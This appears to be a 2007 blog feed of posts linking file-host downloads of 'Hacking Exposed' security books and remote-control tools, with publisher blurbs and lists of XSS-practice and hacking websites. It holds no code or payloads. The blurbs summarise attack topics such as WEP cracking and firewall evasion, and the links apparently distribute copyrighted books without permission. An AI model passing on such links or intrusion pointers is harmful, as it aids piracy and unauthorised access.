Mark Collier is CTO for SecureLogix Corporation. He is an expert author and frequent presenter on the topic of VoIP security. Collier is also a founding member of the Voice over IP Security Alliance.

http://w12.easy-share.com/1267971.html

Hacking Exposed Cisco Networks

2007-11-21T03:28:00.000-08:00

Description:

Here is the first book to focus solely on Cisco network hacking, security auditing, and defense issues. Using the proven Hacking Exposed methodology, this book shows you how to locate and patch system vulnerabilities by looking at your Cisco network through the eyes of a hacker. The book covers device-specific and network-centered attacks and defenses and offers real-world case studies.

Implement bulletproof Cisco security the battle-tested Hacking Exposed way

Defend against the sneakiest attacks by looking at your Cisco network and devices through the eyes of the intruder. Hacking Exposed Cisco Networks shows you, step-by-step, how hackers target exposed systems, gain access, and pilfer compromised networks.

All device-specific and network-centered security issues are covered alongside real-world examples, in-depth case studies, and detailed countermeasures. It’s all here--from switch, router, firewall, wireless, and VPN vulnerabilities to Layer 2 man-in-the-middle, VLAN jumping, BGP, DoS, and DDoS attacks.

You'll prevent tomorrow’s catastrophe by learning how new flaws in Cisco-centered networks are discovered and abused by cyber-criminals.

Plus, you'll get undocumented Cisco commands, security evaluation templates, and vital security tools from hackingexposedcisco.com.

* Use the tried-and-true Hacking Exposed methodology to find, exploit, and plug security holes in Cisco devices and networks
* Locate vulnerable Cisco networks using Google and BGP queries, wardialing, fuzzing, host fingerprinting, and portscanning
* Abuse Cisco failover protocols, punch holes in firewalls, and break into VPN tunnels
* Use blackbox testing to uncover data input validation errors, hidden backdoors, HTTP, and SNMP vulnerabilities
* Gain network access using password and SNMP community guessing, Telnet session hijacking, and searching for open TFTP servers
* Find out how IOS exploits are written and if a Cisco router can be used as an attack platform
* Block determined DoS and DDoS attacks using Cisco proprietary safeguards, CAR, and NBAR
* Prevent secret keys cracking, sneaky data link attacks, routing protocol exploits, and malicious physical access

Pass rar: www.network-ebooks.com
http://rapidshare.com/files/20184634/McGraw_Hacking_Exposed_Cisco_Networks.rar.html

McGraw Hill Hacking Exposed Wireless Mar 2007

2007-11-21T03:27:00.000-08:00

McGraw Hill Hacking Exposed Wireless Mar 2007

Paperback: 386 pages
Publisher: McGraw-Hill Osborne Media; 1 edition (March 26, 2007)
Language: English
ISBN-10: 0072262583
Secure Your Wireless Networks the Hacking Exposed Way

Defend against the latest pervasive and devastating wireless attacks using the tactical security information contained in this comprehensive volume. Hacking Exposed Wireless reveals how hackers zero in on susceptible networks and peripherals, gain access, and execute debilitating attacks. Find out how to plug security holes in Wi-Fi/802.11 and Bluetooth systems and devices. You’ll also learn how to launch wireless exploits from Metasploit, employ bulletproof authentication and encryption, and sidestep insecure wireless hotspots. The book includes vital details on new, previously unpublished attacks alongside real-world countermeasures.

Understand the concepts behind RF electronics, Wi-Fi/802.11, and Bluetooth
Find out how hackers use NetStumbler, WiSPY, Kismet, KisMAC, and AiroPeek to target vulnerable wireless networks
Defend against WEP key brute-force, aircrack, and traffic injection hacks
Crack WEP at new speeds using Field Programmable Gate Arrays or your spare PS3 CPU cycles
Prevent rogue AP and certificate authentication attacks
Perform packet injection from Linux
Launch DoS attacks using device driver-independent tools
Exploit wireless device drivers using the Metasploit 3.0 Framework
Identify and avoid malicious hotspots
Deploy WPA/802.11i authentication and encryption using PEAP, FreeRADIUS, and WPA pre-shared keys

http://rapidshare.com/files/55614854/HEW.rar

Firewalls And Networks How To Hack Into Remote Computers

2007-11-21T03:25:00.000-08:00

Sniffing and spoofing are security threats that target the lower layers of the networking infrastructure supporting applications that use the Internet. Users do not interact directly with these lower layers and are typically completelyunaware that they exist. Without a deliber-ate consideration of these threats, it is impossible to build effective security into the higher levels.

Sniffing is a passive security attack in which a machine separate from the intended destination reads data on a network. The term “sniffing” comes from the notion of “sniffing the ether” in an Ethernet network and is a bad pun on the two meanings of the word “ether.” Passive security attacks are those that do not alter the normal flow of data on a communication link or inject data into the link.

http://rapidshare.com/files/50581184/H_F_N_55092007.rar

BueTooth Remote control

2007-11-21T03:24:00.000-08:00

Use Bluetooth Remote Control both for buisness and pleasure! Give PowerPoint presentation and see the actual slides in the phone. Change songs that are currently being played on Itunes or Media Player, browse for artists, albums, change volume and much more.. Bluetooth Remote Control is a true universal remote control. It allows the user to modify the current behaviour as well as add support for new applications. You can add support by writing Java or VB scripts, defining key maps and file actions. With key maps the user can very easy and fast define application actions and link them to any buttons on the mobile phone. Bluetooth Remote Control is a true universal remote control. It allows the user to modify the current behaviour as well as add support for new applications. You can add support by writing Java or VB scripts, defining key maps and file actions. With key maps the user can very easy and fast define application actions and link them to any buttons on the mobile phone. Bluetooth Remote Control is free to try for as long as you want. The demo version provides a limited number of actions before you are disconnected and must reconnect. The full version can be purchased and registered securely from within the program. Features: - Control iTunes, PowerPoint, Mouse, WinAMP, Windows Media Player and much more - See the actual desktop in your phone - No Bluetooth setup! Just connect from your phone - Create your own applications via Keymaps or VB and JScripts - Supports all PC Bluetooth solutions Toshiba, Windows, BlueSoleil and Widcomm/Brodacom

http://www.megaupload.com/?d=UC0RHE6O
http://rapidshare.com/files/68082672/BluetoothRemoteControl3.rar

Internet Remote Control

2007-11-21T03:22:00.000-08:00

Internet Remote Control enables remote monitoring and control of a DialUp connection. It also enables message communication between connected users and remote program execution on the server.
Internet Remote Control consists of two programs: IRServer and IRClient. The IRServer is installed on the computer that has Internet DialUp connection, and IRClient is installed on all other computers that need to monitor and control connection. IRServer monitors DialUp connection and sends info to all connected clients. Clients can dial, disconnect, communicate and run programs on server. BySoft Internet Remote Control is free for personal and non-profit use (excluding governmental entities and educational institutions); business users must purchase a valid end-user license to continue using the software.

http://rapidshare.com/files/69605662/Internet_Remote_Control_ver2.6.rar

learn XSS/cross site scripting

2007-11-12T03:24:00.001-08:00

U can visit these sites to learn and practice XSS

Http://blogged-on.de/xss
Http://www.pointblanksecurity.com/xss
Http://ha.ckers.org/xss.html

Links

2007-11-12T03:17:00.000-08:00

Here are some of the links for the security(hacking) related websites

http://www.security-freak.net

http://darknet.org.uk

http://sectools.org

http://www.secureroot.com

http://cracktohack.blogspot.com

E-books
http://elearncomputer.blogspot.com

http://jas-books.blogspot.com

Hi all....

2007-11-10T00:42:00.000-08:00

Hello Everyone,

I will start posting soon